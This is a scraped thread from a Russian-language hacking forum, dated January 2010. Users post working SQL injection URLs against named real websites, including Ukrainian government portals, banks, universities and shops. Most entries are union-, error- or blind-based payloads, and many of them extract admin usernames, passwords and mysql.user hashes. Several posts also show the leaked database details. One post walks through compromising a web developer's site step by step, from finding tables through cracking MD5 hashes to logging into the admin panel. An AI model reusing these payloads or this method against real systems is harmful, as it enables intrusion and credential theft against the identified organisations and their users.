http://www.edfashionclothes.com/productlist.php?tid=&fid=7&cid=-36%20union%20select%201,2,3,table_name,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19%20from%20information_ schema.tables+--+
-------------------------------------------------------
http://www.elfconsulting.ro/showart.php?nrart=-10+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),useR(),@@version_compile_os),3,4
Database Version: 5.0.87-community
Database name: elfconsu_news
User name: elfconsu_news@localhost
Os: pc-linux-gnu
Korean e-Sports Players Association (KeSPA)
http://www.e-sports.or.kr/teams/team1.kea?m_code=team_14&t_code=P008'or+1=@@version+and+''='
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.pandurii-tg-jiu.ro/index.php?id=5395%20and%201=0%20union%20select%20a ll%201,2,concat%28version%28%29,0x3a,user%28%29,0x 3a,database%28%29%29,4,5,6,7,8,9%20from%20phpbb_us ers--
5.0.51a-log:panduriitgjiu@192.168.88.3:pandurii_tg_jiu_ro_ pandurii
http://www.grip tonite.com/games/detail/?game=612+and+version()=5
GinTonic
11.01.2010, 17:05
http://pikanta.ru/products/?section=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--
4.1.21-pikanta-root@localhost
StarFire
12.01.2010, 03:45
Commercial Bank Of Ethiopia :D
http://www.combanketh.com/branchdetail.php?bId=-197+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17%20--
/5.1.42
http://www.oknet123.com/rubrique.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion(),@@version_compile_os),2,3,4,5,6,7--+
Strilo4ka
12.01.2010, 22:58
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29,@@version_compile_os%29,3, 4,5,6,7,8
polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+Administrtion
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+tspu1.administrtion
админки :
http://www.tspu.edu.ru/?ur=243&ur1=649
http://libserv.tspu.edu.ru/index1.php?ur1=93&ur=58
#2
http://construct.edu.ru/news.php?id=-62+union+select+1,2,3,4,5,concat_ws%280x3a,user%28 %29,version%28%29,database%28%29,@@version_compile _os%29,7,8--+
construct@localhost:5.1.39-log:construct:portbld-freebsd7.2
http://www.tspu.edu.ru/?ur=243&ur1=649
тут еще кстате скл в авторизации :)
login: 'or+5=5/*
password: asdf
http://www.bla-bla-bla.ru/man/?id=-6+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--
user_blablablaru@localhost:bla-bla-bla_ru:5.0.77
http://www.a1tv.ru/afisha/?city=135293+and+substring(version(),1,1)=5
сообщял им о скуле но никто незакрыл ;)
sqlinjector
14.01.2010, 15:34
Вот маг..
http://www.in2art.com/product_popup.php?prodID=-10486+union+select+1,2,3,group_concat(column_name, 0x3C62723E+SEPARATOR+0x0b),5,6,7,8,9,10,11,12,13,1 4+FROM+information_schema.columns+WHERE+table_sche ma=0x3435303739385F696E32617274+AND+table_name=0x6 D656D62657273--
Знатоки, подскажите, как выдрать целиком колонку, например, email.. там 25к адресов...
пишите в личку плз...
sqlinjector
14.01.2010, 16:32
Истчо Маг
http://www.musicpalace.ru/?go=katalog&catid=82&podcatid=403&prodid=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,group_concat%28table_name,0x3A+SEPARATOR+0x0b%2 9,34,35+FROM+information_schema.tables+WHERE+table _schema=0x623333373437--
DezMond™
15.01.2010, 00:17
http://www.euphonium.net/discography.php?cdID=-37+union+select+1,2,3,4,5,6,7,8+from+guestbook+--+
http://www.brettbaker.co.uk/main.php?s_id=Soloist&id=93&group=&video_id=-4+union+select+1,2,table_name,4,5,6+from+informati on_schema.tables+--+
http://www.6degreesfilm.com/reviews.php?id=-811'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a ,username,password),10,11,12,13,14,15,16,17,18,19, 20,21,22+from+users+limit+2,1+--+
http://www.geardownload.com/reviews.php?id=-55399+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32+FroM+members+/*+
http://www.truemetal.it/reviews.php?op=albumreview&id=-8529+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+from+information_schema.tables+--+
http://www.verletzte-helfer.de/reviews.php?op=printpage&artid=-70+union+select+username,password+from+user+limit+ 1,1+--+
http://www.welsh8ball.com/reviews.php?op=PrintReview&id=-4+union+select+1,2,3,4,5,6,7,8,9+--+
http://membres.multimania.fr/nomad3d/reviews.php?op=PrintReview&id=-1+union+select+1,concat_ws(0x3a3a,aid,pwd),3,4,5,6 ,7,8,9+from+mpn_authors+--+
http://www.macupdate.com/reviews.php?id=12331&pid=-121925+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x 3a3a,id,perms),11,12,13,14,15,16,17,18,19,20,21+fr om+admins+--+
http://qclub.uk-pool.com/reviews.php?op=PrintReview&id=-1+union+select+1,2,concat_ws(0x3a3a,aid,pwd),4,5,6 ,7,8,9+from+mpn_authors+--+
http://www.matheplanet.com/default3.html?call=reviews.php?op=showcontent&id=-455+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15+from+authors+--+&ref=http%3A%2F%2Fwww.google.ru%
http://www.synfulpleasures.com/reviews.php?op=showcontent&id=-119+union+select+1,2,3,concat_ws(0x3a3a,username,p assword),5,6,7,8,9,10,11+from+user+limit+1,1+--+
http://gehnaindia.com/catalogue.php?CID=2&SCID=-2+union+select+1,concat_ws(0x3a3a,username,passwor d),3,4,5,6+from+sitemanager+--+
http://www.psiconline.it/reviews.php?op=showcontent&id=-25+union+select+1,2,3,concat_ws(0x3a3a,aid,name,em ail,pwdion+select+1,2,email,4,password+from+admin+--+
http://www.hcandersen-paraden.dk/paraden.php?id=2&contentid=-6'+union+select+concat_ws(0x3a3a,id,brugernavn,kod eord)+from+loginadmin+--+
http://www.hypernova.dk/index.php?setpage=nyheder&setnewsid=-291'+union+select+1,2,3,4,5,6,7,8+--+
http://www.ksknet.dk/side/content.php?sektion=Holdene&id=-474'+union+select+1,2,3+from+users+--+
http://www.caddealer.com/computingsecurity/reviews.php?id=-36+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10+frOm+infOrmat ion_schema.tAbles+/*+
http://ffejournal.com/articles.php?book=-FFE+%238'+union+select+1,2,3,4,5,6,7,8,9+--+
http://biosilkeborg.dk/show-content.php?id=-1+union+select+1,concat_ws(0x3a3a,userID,username, password,AdministratorRights),3,4+from+users+where +AdministratorRights=1+--+
http://www.kirosydfyn.dk/dynamisk/spg_og_svar/16_spg.php?id=-34+union+select+1,2,3,4,5,6+--+
http://www.substral.se/?page=products&type=products_outdoor&id=-4'+union+select+1,2,3,4,5+from+information_schema. tables+--+&menu=1
http://scae.dk/index2.php?menuid=25&parent=-23+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.soulportal.dk/reviews.php?op=showcontent&id=-701+union+select+1,2,3,concat_ws(0x3a3a,aid,name,e mail,pwd,radminsuper),5,6,7,8,9,10,11+from+authors +limit+4,1+--+
http://talkislam.org/ptiming/link_body.php?linkId=-12+union+select+1,2,usr_password+from+tbluser+--+
http://www.go-sochi.ru/objinfo.php?prodId=28+UNION+SELECT+1,CONCAT_WS(0x3 a,Version(),Database(),User()),3,4+LIMIT+1,1--+
Database Version: 5.0.32-Debian_7etch11-log
Database name: mnemonic_gosochi
User name: mnemonic_gosochi@77.221.130.9
http://www.newemotion.it/en/mobile_phone.php?ProdID=494+UNION+SELECT+1,2,3--
Database Version: 5.0.67-community
Database name: admin_new_emotion
User name: admin_alexandros@localhost
sqlinjector
17.01.2010, 22:06
http://www.supportsolutions.co.za/job.php?job_id=-433+union+select+1,database(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16--
Strilo4ka
17.01.2010, 22:28
http://www.traindisaster.ru/database.php?id=-1+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29,@@version_compile_os%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42--+
5.0.67-log:u169104:u169104@10.10.153.197:unknown-freebsd6.3
http://rulada.ru/viewcross.php?cid=-70+union+select+1,2,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29,@@version_compile_os%29 ,4,5,6,7,8,9,10--+
5.0.32-Debian_7etch11-log:z86577_db:z86577_db@77.221.130.19:pc-linux-gnu
http://www.no-brand.ru/cloth/cloth.php?cid=282+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12--+
http://www.berus.ru/catalog.php?cid=-26+union+select+1,version%28%29,3,4,5,6,7--+
http://spbrabota.org.ru/podvak.php?i_d=-146+union+select+1,version%28%29,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23--+
http://ladydark.ru/page_02.php?uin=-60+union+select+1,2,version%28%29,4,5,6,7,8,9--+
Strilo4ka
18.01.2010, 02:27
http://www.trt.ru/Stock.php?Part=500+union+select+1,concat_ws%280x3a ,unhex%28hex%28version%28%29%29%29,unhex%28hex%28u ser%28%29%29%29,unhex%28hex%28database%28%29%29%29 %29,3,4,5,6,7,8,9--+
4.1.18:trt@rex.hc.ru:wwwtrtru
тиц 350
выводим в ошибке!
http://www.iling-ran.ru/index.php?part=374+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),0x3a,database(),0x3a,floor(rand(0)*2)) )--Version: 4.1.25-log:
DB: ilingra6_site
user: ilingra6_bd@localhost
OS: portbld-freebsd6.3
http://flyingweb.dreamhosters.com/note_news.php?rid=-10+union+select+1,2,3,4,group_concat(concat_Ws(0x3 a,loginName,password)),6,7,8,9,10,11,12,13,14,15,1 6+from+flyingweb.flyingweb_admin_user---
5.0.67-userstats-log
flyingweb
zyf2008@bowser.dreamhost.com
Strilo4ka
18.01.2010, 19:52
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29,@@version_compile_os%29,3, 4,5,6,7,8
polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu
polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+Administrtion
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+tspu1.administrtion
Коммунистическая партия Китая. Организация департамента Dashiqiao
http://www.dsqzzb.gov.cn/kxfz/news.php?sid=-23+union+select+1,version()--+
У кого там зуб на Украину? :P.. у меня нет.. ) Там щас выборы в Украине..Потому.. :)
Официйний сайт Державного департамента з усиновлення та захисту прав дитини Міністерства України у справах сім'ї, молоді та спорту
http://www.ditu.gov.ua/en/decrees/-2177+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,10,11, 12,13,14,15,16+from+mysql.user--+
user() - root@localhost
version() - 5.0.51b-community-nt-log
database() - depdeti
file_priv = Y
/phpmyadmin/ присутствует
/admin/ тоже
Чернігівська облдержадміністрація
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,user||chr%2858%29||passwd+from+co m.users+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
http://cg.gov.ua/static_list.php?menu_id=1&NameTable=static_list&TypeCod=&DEPAT=29+and+1=cast%28%28SELECT+current_user||chr% 2858%29||current_database%28%29||chr%2858%29||vers ion%28%29%29+as+int%29--&pm=blue_menu
http://sosadm.cg.gov.ua/single_page.php?menu_id=-5+and+1=cast%28%28SELECT+current_user||chr%2858%29 ||current_database%28%29||chr%2858%29||version%28% 29%29+as+int%29--&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
user - www
database - portal
version - PostgreSQL 8.3.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.2.4
Как я понял, все поддомены там под одним юзвером и двигом. Получается добавим список уязвимых (под)сайтов.
bobradm.cg.gov.ua
borzadm.cg.gov.ua
chernrda.cg.gov.ua
goradm.cg.gov.ua
ichadm.cg.gov.ua
koradm.cg.gov.ua
kpadm.cg.gov.ua
kuladm.cg.gov.ua
meadm.cg.gov.ua
neadm.cg.gov.ua
nosadm.cg.gov.ua
novgadm.cg.gov.ua
oda.cg.gov.ua
pladm.cg.gov.ua
rpadm.cg.gov.ua
schorsadm.cg.gov.ua
semadm.cg.gov.ua
sribadm.cg.gov.ua
taladm.cg.gov.ua
varadm.cg.gov.ua
не кисло :)
Система розкриття інформації на фондовому ринку України. Агентство по развитию инфраструктуры фондового рынка Украины
http://www.smida.gov.ua/emitents/zvit_menu.php?id=4746+and+substring(version(),1,1) =4&forma=PERSON_Z&zvit_type=zat414&kod=32979387
http://old.smida.gov.ua/news/sv_1.php?id_news=-8077+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),version(),database()),9,10,11,12,13,14
Disallow: /adminzone/
phpinfo.php на месте ;)
user() - dbu@localhost
version() - 4.1.20-log
database() - smida
ВИЩА КВАЛІФІКАЦІЙНА КОМІСІЯ АДВОКАТУРИ при Кабінеті Міністрів України
http://www.vkka.gov.ua/index.php?page=katalog&id=-41+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17--+
version() - 5.1.30-log
user() - vkka_root@localhost
database() - vkka_adv
все выводиться на ура ;)
админка присутствует.
http://www.htf.ru/?pageId=5&newsId=-10+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+--+
htf@localhost:htf:5.0.77-log
Если кому интересно, большинство сайтов тицастые и пиаристые.
---1---
http://mgta.ru/raspisania/rasp'+or(1,1)=(select+count(*),concat(concat(1,0x3 a,(select+concat(user,0x3a,password,0x3a,file_priv )+from+mysql.user+LIMIT+0,1)),floor(rand(0)*2))fro m+mysql.user+group+by+2)--+/
version() - 5.0.841
user() - meli@localhost1
database() - wwwmeliru_sb1
Права на запись есть.
---3-blind---
http://nova-budova.com.ua/?n=press_center&type=shares'+and+substring(version(),1,1)='5
5-я версия
//=============================================== start usoft
Уязвимости от компании Ю-софт. Разрабатывают сайты 16 лет.
Особенность: 1. На некоторых уязвимых сайтах нельзя подставить 'пробел' '*'. Вывод ошибки работает в опере, в мозиле не работает. Все сайты которые я просмотрел, я вылаживаю.
Возможные варианты вывода.
---4-банк---
http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select(name_const( (select(table_name)from(information_schema.tables) where(table_name)LIKE('CHARACTER_SETS')),1)),name_ const((select(table_name)from(information_schema.t ables)where(table_name)LIKE('CHARACTER_SETS')),1)) a)='5/
http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select+name_const( version(),1),name_const(version(),1))a)='5
Остальные сайты..
---6-Blind. Ещё один сайт юсофта---
Тут пробелы не фильтруются, но и вывода в дублях нету. поэтому получается blind inj
http://u-torg.ru/news/?act=show_news&id=2489+and+substring(version(),1,1)=5#
---7-Компания---
http://www.interstroy-v.ru/objects/ob30'or(1,1)=(select*from(select+name_const(versio n(),1),name_const(version(),1))a)='5
---8-компания---
http://www.priorityins.ru/fiz'or(1,1)=(select*from(select+name_const(version (),1),name_const(version(),1))a)='5
---9-Банк солидарность---
http://www.solidar.ru/news'or(1,1)=(select(0)from(select+name_const(vers ion(),1),name_const(version(),1))a)='5/new_kart/
---10-blind. Какой сайт, понятно по названию---
http://mos-gorsud.ru/news/?id=235+and+lower(ascii(substring(user(),1,1)))=11 4
root@....
Ну и в заключение...
---11-Usoft---
Ну собственно как же оставить без внимания сам сайт Ю-софта.. :)
Для начала найдём какуе-то инъекцию у них на сайте. А именно...
http://www.usoft.ru/vopros/legalnews'or(1,1)=(select*from(select+name_const(v ersion(),1),name_const(version(),1))a)='5/
Всё ок, но как же нам упростить задачу по перебору? Давайте посмотрим что там ещё висит у них.. Находим такой поддомен.
http://pilot.usoft.ru
Составим запрос для подбора таблички.
http://pilot.usoft.ru/?tid=4+or(1,1)=(select+count(0),concat((select+tab le_name+from+information_schema.tables+limit+17,1) ,floor(rand(0)*2))from(information_schema.tables)+ group+by+1)+--+
Теперь для быстрого подбора колонки. Я сделаю это так.
http://pilot.usoft.ru/?tid=4+or(1)=(select+*+from(select+*+from+auth_use r+as+a+auth_user+as+b+USING(id))c)--+
Далее собственно подставляем в USING то что вылазит в эроре.
Ну а потом, достаем логины и пароли. Пароли там в md5, но первый же юзер как ни странно админский с хешем который мгновенно расшифровуется через crackfor.me
Ну и в конце логинимся через /admin/, никакх защит по ip как ни странно там нету.
Внимание! В примере номер 11 стоит моя личная защита "антидурак" :)
//================================================ end usoft
---12-сайт не ломать ;)---
http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from information_schema.tables a JOIN information_schema.tables b)c)='1
http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from (select * from information_schema.tables a)b JOIN (select * from information_schema.tables d)c USING(TABLE_CATALOG))g)='1
запятые косят запрос. Получилось вывести только так. Если кто выведет проще, буду рад посмотреть.
---13---
http://www.vstoneft.ru/analit.php?number=141+union+select+1,2,3,4,5,6,ver sion(),8,9--
---14---
http://www.mebel-aliance.ru/tables.php?id=63'+union+select+1,2,3,4,concat(tabl e_schema,0x3a,table_name,0x3a,column_name),6,7,8,9 ,10,11,12,13,14+from+information_schema.columns--+
без ограничения
---15---
http://www.platforma.ru/search/?search=%'+and+(1,1)=(select+count(*),concat(versi on(),floor(rand(0)*2))from+essentials+group+by+2)+--+
version() - 4.1.21
user() - platforma@www.plus.ru
database() - platforma
//================================================ start News Edit
Движок News Edit от Newsedit.ru
Снова ошибка в переменной которая обратабывается через .htaccess, такое чувство разработчики думают, что htaccess что-то фильтрует.
---16---
http://www.wn.ru/video/01.12.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
---17---
http://www.cdrinfo.ru/news/28.10.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
---18---
http://www.parovozik.ru/news/11.11.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
---19-1500 тица ;)---
тут пароля в открытом виде ;)
http://pro-n.ru/news/12.01.2010/2+union+select+1,version%28%29,3,4,5,6,7,8,9,10+fr om+users--.html
//================================================ end News Edit
---20---
ууу, какой страшный сайт.. :P
http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((se lect+table_name+from+information_schema.tables+lim it+26,1),floor(rand(0)*2))from(information_schema. tables)+group+by+2)+--+
http://www.stalin.su/book.php?bid=1+or(1,1)=(select*from(select*from+st _xuser+as+a+join+st_xuser+as+b+USING(id))c)+--+
http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((se lect+concat_ws(0x3a,access,login,password)+from+st _xuser+LIMIT+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)+--+
---21---
http://www.inform-soccer.com/TOTO/tstscores.php3?TURNIR=409&ID=-158682+union+select+1,2,3,version(),5,6--
version() - 4.1.25-log
user() - soccer@localhost
database() - inform_soccer_com
---22-Blind---
http://www.skoma.ru/catbuilder.php?id=24+and+substring(version(),1,1)= 4
---23---
http://www.stroimarket.info/goods.php?viewprod=2&id=5&pid=10'+or(1,1)=(select+*+from(select+name_const(( select+table_name+from+information_schema.tables+W HERE+table_name+LIKE+'%user%'+LIMIT+0,1),1),name_c onst((select+table_name+from+information_schema.ta bles+WHERE+table_name+LIKE+'%user%'+LIMIT+0,1),1)) a)/*
---24---
вывод смотрите в html, он вообщем в хрефе.
http://mirrortuning.ru//oneadmin/
http://mirrortuning.ru/photos.php?category_id=&parent_id=-0+UNION+SELECT+version(),2&photo_id=18&start=123
Database Version: 5.0.67-userstats-log
Database name: mt
User name: ender@tampico.dreamhost.com
---25-Blind---
http://www.gestia.com.ua/fs/wywod_stati/?showiblo=332'+and+substring(version(),1,1)=4/*
---26---
Вывод после редиректа в адресной строке.
http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(version(),da tabase(),user()),9,10
http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(table_schema ,0x3a,table_name),9,10+from+information_schema.tab les+where+table_name+LIKE+'%user%'+LIMIT+0,1
---28---
Без ограничений.
http://www.infra-audit.ru/doc.php?doc_id=4+union+select+1,concat_ws(0x3a,tab le_schema,table_name,column_name),3,4,5,6,7+from+i nformation_schema.columns
---29---
Без ограничений.
http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND% 20_goods.is_publish=%271%27%20AND%20_subcats.is_pu blish=%271%27%20AND%20_cats.is_publish=%27%27%20AN D%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods .idc%20union+select+1,2,3,4,5,concat_ws%280x3a,tab le_schema,table_name,column_name%29,7,8,9+from+inf ormation_schema.columns+where+table_name=%27_users %27+--+
http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND% 20_goods.is_publish=%271%27%20AND%20_subcats.is_pu blish=%271%27%20AND%20_cats.is_publish=%27%27%20AN D%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods .idc%20union+select+1,2,3,4,5,concat_ws%280x3a,log in,assword,mail%29,7,8,9+from+_users+LIMIT+200+--+
http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND% 20_goods.is_publish=%271%27%20AND%20_subcats.is_pu blish=%271%27%20AND%20_cats.is_publish=%27%27%20AN D%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods .idc%20union+select+1,2,3,4,5,concat_ws%280x3a,adm in_firstname,admin_lastname,admin_password,admin_e mail_address,admin_right_access%29,7,8,9+from+admi n+LIMIT+200+--+
---30---
http://www.iie.tpu.ru/ru/seenews.php?IDNews=159+and+substring(version(),1,1 )=3
3-я версия.
---31---
http://bellenmetip.net/actueel/nieuws/329/nassau-academy-unieke-samenwerking-onderwijs-en-bedrijfsleven'+or(1,1)=(select*from(select+name_co nst(version(),1),name_const(version(),1))b)+--+/
---32-blind---
http://www.arbonica.ru/marketing'+or+substring(version(),1,1)=5--+/
перебирать можно так..
http://www.arbonica.ru/marketing'+and+lower(ascii(substring(user(),1,1))) =114
юзвер != рут :(
---33---
Sweb блочит 'from', через post - сценарий не работает. Потому можно получить только user(), version() etc...
http://www.beauty-fitness.ru/users/?id=-1324'+union+select+1,user(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30--+
---34---
http://www.my-antiage.ru/index.php?id=49+union+select+1,2,3,4,5,version(),7 ,8,9--
version() - 4.1.25-log
user() - lipopla8_sdr@localhost
database() - lipopla8_acc
---35---
http://cdd.aac.ru/index.php?id=20'and(substring(version(),1,1))=4--+
---36---
http://www.chuvrdub.ru/base/base.html?mode=aut&id=-47+UNION+SELECT+1,2,version(),4--
version() - 5.0.84-percona-highperf-b18-log
user() - anhelga_user1@91.195.124.9
database() - anhelga_authors
---37---
http://www.hedef-makina.com/ru/index.php?p=sayfa&item=duyuru&id=-27+union+select+1,2,3,database(),5,6,7,user(),9,10 ,11--
5.0.45-community-nt
hedef-makina
hedef@localhost
---41---
Без ограничений
http://www.sotovyi.ru/index.php?cid=11&pid=63/**/union/**/select/**/concat(table_schema,0x3a,table_name,0x3a,column_na me),2,3,4,5,6/**/from/**/information_schema.columns--
---42---
http://parkhotelgardenia.com/conference_hall.php?pos=6+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4
version() - 5.0.85-community-log
user() - prkhote_slava@localhost
database() - prkhote_gardenia
Забыл какая тут табличка, а переберать в 5 утра лень) Но помню что там колонки id:username:password:idrights:realname
И пароль там подходит от мыльника админа
--------------------------------------------
Есть конечно ещё вкусное, но не всё сразу..
Чем больше критики, тем лучше, желательно пм.
Спасибо за внимание.
Strilo4ka
20.01.2010, 17:31
PR 5
ТИЦ 700
http://www.isp.nsc.ru/newface/index.php?ACTION=part&id_main=-1+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os),2,3--+&id_sub=25&id_news=78
5.0.77-log:website:admin@www.isp.nsc.ru:portbld-freebsd7.0
BD:
information_schema:anketa:asut:dbmail:dspam:fotoni ka2009:glpi:invitation:ipacct:jabberd2:joomla:lib_ mba:library:mysql:ng_stat:norma:ocsweb:olka:site:s ymposium:system_ball:test:test_lib:thesis:website: ysc:ysc_copy
http://www.isp.nsc.ru/newface/index.php?ACTION=part&id_main=-1+union+select+GROUP_CONCAT(TABLE_NAME%20SEPARATOR %200x3a),2,3+FROM%20information_schema.TABLES+WHER E%20TABLE_SCHEMA=0x77656273697465+--+&id_sub=25&id_news=78
body:body_eng:news:structure:structure_admin:struc ture_eng:users
с результата запроса и ежу понятно что не одна таблица users (есть в других БД) когда узанем атрибуты таблы users вот они ^_^
id:login:pass:ip:last_keepalive:type:enabled:day_q uota:month_quota:fullname:desc:admin_level:id:name :passwd:sotrid:chek:id:surname:fname:secname:email :name_doclad:type_doclad:check_send:check_confirm: auth_doclad:id:name:passwd:sotrid:chek:id:user_log in:user_password:user_type
логин и пасс
http://www.isp.nsc.ru/newface/index.php?ACTION=part&id_main=-1+union+select+concat_ws(0x3a,user_login,user_pass word),2,3+from+users--+&id_sub=25&id_news=78
В гугле несколько каталогов с которыми работают БД перечислены выше ,и у всех пр 5 когда посмотреть!
через этот сайт можно доставать инфу .
магические включены, есть webmail и еще много вкусностей, алгоритмы шифрования пассов md5 и mysql , кстати читалка в скуле работает , забыл сказать и хешкрекинг.инфо не выдал пасс md5 , но зато есть темка на античате <on-line сервисы розшифровки> то там нашел ;-)
в гугле для поиска других :) site:isp.nsc.ru
Ех,класно что опять античат то заработал :)
Krist_ALL
20.01.2010, 21:09
http://cards.km.ru/cardslist.asp?id_real={78EFE1E1-0D03-4515-8CC9-3ADC2F09D300}' and 1=@@version--'
nemaniak
21.01.2010, 11:42
giscripts.in
http://www.giscripts.in/b2b/selloffers.php?cid=-14+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8--
5.0.81-community:yellowpa_glrd@localhost:yellowpa_b2b
secureb2b.com
http://www.emerix.com/selloffers.php?cid=-1+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29,database%28%29%29,3,4,5,6,7,8--
5.0.51a-24+lenny2-log:ks8136@localhost:ks8136db1
DezMond™
22.01.2010, 16:50
http://www.vertavo.com/repspecs.php3?counter=-254+union+select+1,2,3,4,5,6,7,8+from+admin+--+
http://www.multistore.ch/index.php?catid=864+union+select+1,2,unhex(hex(use r())),4,5,6+/*+&subcatid=224http://www.donpaco.ch/events_det.php?galerie_id=-278+union+select+1,2,3,4,5,6,7,8,9,10+--+
http://www.impuls-nn.ru/shop/more/?iid=-100012860+union+select+1,2,3,4,5,concat_ws(0x3a3a, cid,clogin,cpass,corg,ctype),7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+impulse_users+where+ctype=0 +--+
http://www.beautifulpalestine.com/largpic.php?id=-312+union+select+1,2,3,concat_ws(0x3a3a,username,p assword),5,6,7+from+members+--+&lid=13
http://apla-pal.org/show_news_details.php?id=-85+union+select+1,column_name,3,4,5,6,7,8+from+inf ormation_schema.columns+where+table_name=0x7573657 273+--+
http://nhn.meerbusiness.nl/partners/partners_showitems.asp?type=sponsor'+uNIon+seLEct+ 1,2,3,4,5+--+&content_id=6
http://femgmbh.com/photogallery.php?action=liste&rubrikid=63+union+select+database(),2+/*+
http://www.singaporechefs.com/publicsite/newsdetail.php?id=-48'+union+select+1,2,3,4,concat_ws(0x3a3a,username ,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23+from+user+--+
http://www.asiacuisine.com.sg/eventcalendar.php?eventdate=-2010-1-24'+union+select+1,concat_ws(0x3a3a,user_id,userna me,password,enpassword,ip,lastlogin,lastlogout,pri vilege),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+cw a_user+--+
http://www.gourmetabudhabi.ae/ad2010/english/representative.php?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,password,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+ user+--+
